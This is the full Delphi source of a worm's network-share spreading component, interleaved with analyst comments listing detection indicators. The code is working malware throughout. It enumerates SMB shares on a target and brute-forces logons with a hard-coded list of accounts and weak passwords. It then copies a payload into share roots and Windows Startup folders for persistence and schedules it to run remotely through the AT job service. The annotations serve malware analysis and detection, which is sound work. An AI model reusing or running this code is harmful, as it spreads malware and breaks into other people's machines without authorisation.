UNIT netbios_spreader;
INTERFACE
uses
Windows,
Winsock,
WinInet;
Const
// Analyst note: this unit is the share-spreading component of a worm. The
// tables below are its credential dictionary and its drop locations; both are
// plain strings in the binary and make good static indicators for this family.
NETBIOS_MAX_PASSWORD = 2;
// Password candidates tried for each account by InfectSharedResource (blank first).
NETBIOS_PASSWORD: ARRAY [0..NETBIOS_MAX_PASSWORD] OF STRING = (
'','1234','password');
NETBIOS_PATHSIZE = 4;
// Destination directories under a connected share: the share root plus three
// per-OS "Startup" folders, so a dropped file runs at the next logon
// (persistence via Startup folder).
NETBIOS_PATH: ARRAY [1..NETBIOS_PATHSIZE] OF STRING = (
'\',
'\Documents and Settings\All Users\Start Menu\Programs\Startup\',
'\WINDOWS\Start Menu\Programs\Startup\',
'\WINNT\Profiles\All Users\Start Menu\Programs\Startup\');
NETBIOS_MAX_USERNAME = 3;
// Account names tried in this order. A burst of failed network logons with
// these names from a single source host is a detection signal.
NETBIOS_USERNAME: ARRAY [0..NETBIOS_MAX_USERNAME] OF STRING = (
'Guest', 'Administrator', 'Owner', 'Root');
VAR
// netapi32.dll exports resolved at runtime by InitNETAPIFunctions (run from the
// unit's INITIALIZATION section) instead of being linked statically. The
// prototypes mirror the Win32 Network Management API.
lpNetApiBufferFree : FUNCTION(Buffer:Pointer) : DWORD;STDCALL;
// Reads the remote host's clock; used to time the scheduled job.
lpNetRemoteTOD : FUNCTION(UNCServerName:pChar;BufferPtr:pByte) : DWORD;STDCALL;
// Creates an AT-style scheduled job on the remote host.
lpNetScheduleJobAdd : FUNCTION(ServerName:pChar;Buffer:pByte;VAR JobID:DWORD) : DWORD;STDCALL;
// Legacy share enumeration prototype; declared but never resolved in this unit.
OLD_NetShareEnum : FUNCTION(pszServer:pChar;sLevel:SmallInt;VAR Bufptr;cbBuffer:Cardinal;VAR pcEntriesRead,pcTotalAvail:Cardinal) : DWORD; STDCALL;
// NT-style NetShareEnum with resume handle; used by EnumShare.
NT_NetShareEnum : FUNCTION(ServerName:pWideChar;Level:DWORD;VAR Bufptr;Prefmaxlen:DWORD;VAR EntriesRead,TotalEntries,resume_handle:DWORD) : DWORD; STDCALL;
PROCEDURE InitNETAPIFunctions;
Function NetbiosRoot(szIPAddr: String; Port: Integer): Boolean;
IMPLEMENTATION
CONST
NERR_SUCCESS = 0; // Network Management API success code, checked after NetRemoteTOD
STYPE_PRINTQ = 1; // share type of a print queue; the only share type EnumShare skips
FUNCTION DirectoryExists(CONST Dir:STRING) : BOOL;
// True when Dir names an existing filesystem object whose attributes carry
// FILE_ATTRIBUTE_DIRECTORY. A GetFileAttributes failure ($FFFFFFFF,
// INVALID_FILE_ATTRIBUTES) yields False.
VAR
dwAttrs : DWORD;
BEGIN
Result:=False;
dwAttrs:=GetFileAttributes(pChar(Dir));
IF dwAttrs=$FFFFFFFF THEN Exit;
Result:=(dwAttrs AND FILE_ATTRIBUTE_DIRECTORY)=FILE_ATTRIBUTE_DIRECTORY;
END;
// Schedules szLocation to run on the remote host szRemoteAddr via the AT job
// scheduler: reads the target's clock with NetRemoteTOD, adds one minute, and
// submits the command with NetScheduleJobAdd. From a defender's view this is
// remote code execution through the scheduler service; job creation on the
// target host (typically over the atsvc RPC pipe — confirm for the platform)
// is the event to alert on.
PROCEDURE NetRemoteExecute(szLocation, szRemoteAddr:STRING);
TYPE
// Local copies of TIME_OF_DAY_INFO and AT_INFO from the Windows SDK.
PTIME_OF_DAY_INFO = ^TTIME_OF_DAY_INFO;
TTIME_OF_DAY_INFO = RECORD
tod_elapsedt : DWORD;
tod_msecs : DWORD;
tod_hours : DWORD;
tod_mins : DWORD;
tod_secs : DWORD;
tod_hunds : DWORD;
tod_timezone : LongInt; // minutes from UTC; -1 when unknown (see check below)
tod_tinterval : DWORD;
tod_day : DWORD;
tod_month : DWORD;
tod_year : DWORD;
tod_weekday : DWORD;
END;
AT_INFO = RECORD
JobTime : DWORD; // milliseconds since midnight, in the target's local time
DaysOfMonth : DWORD;
DaysOfWeek : UCHAR;
Flags : UCHAR;
Command : pWideChar;
END;
VAR
JobID : DWORD;
dwRemoteTime : DWORD;
dwReturn : DWORD;
NetAT : AT_INFO;
wcCmd : PWideChar;
wcServer : PWideChar;
lpNetTOD : PTIME_OF_DAY_INFO;
BEGIN
// Wide-char copies of the command line and server name for the UNICODE APIs.
GetMem(wcCmd,1024+1);
GetMem(wcServer,256+1);
lpNetTOD:=NIL;
StringToWideChar(szRemoteAddr,wcServer,256);
StringToWideChar(szLocation,wcCmd,1024);
// Ask the target for its current time; the buffer is API-allocated and must be
// released with NetApiBufferFree.
dwReturn:=lpNetRemoteTOD(pChar(szRemoteAddr),@lpNetTOD);
IF dwReturn=NERR_Success THEN
BEGIN
// Remote time-of-day in milliseconds since midnight.
dwRemoteTime:=(lpNetTOD.tod_hours*3600+lpNetTOD.tod_mins*60+lpNetTOD.tod_secs)*1000+lpNetTOD.tod_hunds*10;
// Shift from UTC to the target's local time when a zone offset is reported.
IF (lpNetTOD.tod_timezone <> -1) Then
dwRemoteTime := dwRemoteTime - lpNetTOD.tod_timezone * 60000;
// 60000 ms is one minute, despite what the original note says.
dwRemoteTime:=dwRemoteTime+60000; //* add two minutes to current remote time
lpNetApiBufferFree(lpNetTOD);
// One-shot job (DaysOfMonth/DaysOfWeek/Flags all zero) running szLocation.
ZeroMemory(@NetAT,SizeOf(NetAT));
NetAT.JobTime:=dwRemoteTime;
NetAT.Command:=wcCmd;
lpNetScheduleJobAdd(pChar(wcServer),@NetAT,JobID);
END;
FreeMem(wcCmd);
FreeMem(wcServer);
END;
// Attempts to connect to \\szRemoteAddr\szRemoteName with every
// username/password pair from the tables above. On a successful connection it
// copies a local file named 'a.exe' to Install.exe in each known directory of
// the share and asks the target to run it via NetRemoteExecute. Returns True
// only if at least one copy succeeded.
// Detection notes: a run of failed network logons using the fixed account list,
// followed by a new Install.exe appearing in a Startup folder over SMB.
FUNCTION InfectSharedResource(szRemoteName, szRemoteAddr:STRING) : BOOL;
VAR
MaxUserName : WORD;
MaxPassword : WORD;
I : DWORD;
dwRet : DWORD;
szFullPath : STRING;
nK : Integer;
nL : Integer;
nN : Integer;
NetResource : TNetResource;
BEGIN
Result:=False;
// Build the UNC path of the share and describe it as a disk resource.
szRemoteName:=szRemoteAddr+'\'+szRemoteName;
NetResource.dwType:=RESOURCETYPE_DISK;
NetResource.lpLocalName:=NIL;
NetResource.lpRemoteName:=pChar(szRemoteName);
NetResource.lpProvider:=NIL;
// szFullPath is never used afterwards; the copy below relies on a file named
// 'a.exe' in the process's current directory instead of the module path.
GetModuleFileName(GetModuleHandle(NIL),pChar(szFullPath),Length(szFullPath));
MaxUserName:=NETBIOS_MAX_USERNAME;
MaxPassword:=NETBIOS_MAX_PASSWORD;
// Credential brute force: every account name against every password.
FOR nK:=0 TO MaxUserName DO BEGIN
FOR nL:=0 TO MaxPassword DO BEGIN
dwRet:=WNetAddConnection2(NetResource,pChar(NETBIOS_PASSWORD[nL]),pChar(NETBIOS_USERNAME[nK]),0);
IF dwRet=NO_ERROR THEN BEGIN
// Drop and schedule the payload in each directory that exists on the share.
FOR I:=1 TO NETBIOS_PATHSIZE DO BEGIN
IF DirectoryExists(NetResource.lpRemoteName+NETBIOS_PATH[I]) THEN BEGIN
IF CopyFile(pChar('a.exe'),pChar(szRemoteName+NETBIOS_PATH[I]+'Install.exe'),False) THEN BEGIN
NetRemoteExecute(szRemoteName+NETBIOS_PATH[I]+'Install.exe', szRemoteAddr);
Result:=True;
END;
END;
END;
// Tear the connection down; retried up to 21 times because a forced cancel
// can fail while the copy is still being flushed.
FOR nN:=0 TO 20 DO IF WNetCancelConnection(NetResource.lpRemoteName,True)=NO_ERROR THEN Break;
END;
END;
END;
END;
// Enumerates the shares exported by szRemoteAddr (NetShareEnum, info level 1)
// and hands every non-print-queue share to InfectSharedResource. Only print
// queues are filtered, so administrative shares such as IPC$ and ADMIN$ are
// attempted as well. Result reflects the outcome of the LAST share tried, not
// whether any share was infected.
FUNCTION EnumShare(szRemoteAddr: String): BOOL;
TYPE
// Local copy of SHARE_INFO_1 from the Windows SDK.
Share_INFO_1 = RECORD
shi1_netname : PWideChar;
shi1_type : DWORD;
shi1_remark : LPTSTR;
END;
LPShare_INFO_1 =^Share_INFO_1;
VAR
dwK : DWORD;
hResume : DWORD;
dwReturn : DWORD;
dwReadEntires : DWORD;
dwTotalEntires : DWORD;
szShareName : STRING;
wcRemoteAddr : pWideChar;
lpShareInfo : LPSHARE_INFO_1;
lpCurrentInfo : LPSHARE_INFO_1;
BEGIN
Result:=False;
GetMem(wcRemoteAddr,MAX_PATH);
StringToWideChar(szRemoteAddr,wcRemoteAddr,MAX_PATH);
hResume:=0;
// Page through the share list; ERROR_MORE_DATA means another call is needed
// with the same resume handle. Any other non-success code ends the loop.
REPEAT
lpShareInfo:=NIL;
dwReturn:=NT_NetShareEnum(wcRemoteAddr,1,lpShareInfo,8192,dwReadEntires,dwTotalEntires,hResume);
IF(dwReturn<>ERROR_MORE_DATA)AND(dwReturn<>ERROR_SUCCESS) THEN Break;
lpCurrentInfo:=lpShareInfo;
FOR dwK:=0 TO dwReadEntires-1 DO BEGIN
szShareName:=lpCurrentInfo.shi1_netname;
IF lpcurrentinfo.shi1_type<>STYPE_PRINTQ THEN Result:=InfectSharedResource(szShareName, szRemoteAddr);
Inc(lpCurrentInfo);
END;
// The enumeration buffer is API-allocated; release it with NetApiBufferFree.
lpNetAPIBufferFree(lpShareInfo);
UNTIL dwReturn<>ERROR_MORE_DATA;
FreeMem(wcRemoteAddr);
END;
// Public entry point. Opens a TCP connection to szIPAddr:Port purely as a
// reachability probe (the caller chooses the port; presumably a NetBIOS/SMB
// port, but nothing here depends on it), then enumerates and attacks the
// shares under \\szIPAddr. Returns True when EnumShare reported success.
// Detection note: a bare TCP connect immediately followed by share
// enumeration from the same source is the observable pattern.
Function NetbiosRoot(szIPAddr: String; Port: Integer): Boolean;
VAR
R : BOOL;
Sock : TSocket;
SockAddr : TSockAddrIn;
szRemoteAddr : String;
WSA : TWSAData;
BEGIN
Result := False;
R := False;
// Winsock 1.1 is enough for a plain connect.
WSAStartUP($101, WSA);
Sock:=Socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
SockAddr.sin_family:=AF_INET;
SockAddr.sin_port:=htons(Port);
SockAddr.sin_addr.S_addr:=inet_addr(pChar(szIPAddr));
// The socket is only a liveness check: it is closed as soon as connect succeeds.
IF connect(Sock,SockAddr,SizeOf(SockAddr))<>SOCKET_ERROR THEN
BEGIN
CloseSocket(Sock);
szRemoteAddr:='\\'+szIPAddr;
R:=EnumShare(szRemoteAddr);
END;
WSACleanUP();
IF R THEN Result := TRUE;
END;
// Resolves the netapi32.dll entry points used by this unit at runtime.
// OLD_NetShareEnum is never assigned here. Neither LoadLibrary nor any
// GetProcAddress result is checked, so the pointers may be NIL on a host
// lacking these exports.
// Detection note: the export names below appear as plain strings in the
// binary, and LoadLibrary('netapi32.dll') paired with GetProcAddress of
// NetScheduleJobAdd is a recognisable lateral-movement signature.
PROCEDURE InitNETAPIFunctions;
VAR
NETAPI32 : Thandle;
BEGIN
NETAPI32:=LoadLibrary('netapi32.dll');
lpNetRemoteTOD:=GetProcAddress(NETAPI32,'NetRemoteTOD');
lpNetScheduleJobAdd:=GetProcAddress(NETAPI32,'NetScheduleJobAdd');
NT_NetShareEnum:=GetProcAddress(NETAPI32,'NetShareEnum');
lpNetAPIBufferFree:=GetProcAddress(NETAPI32,'NetApiBufferFree');
END;
INITIALIZATION
// Runs when the unit is loaded: netapi32 entry points are resolved before any
// caller can reach NetbiosRoot.
InitNETAPIFunctions;
END.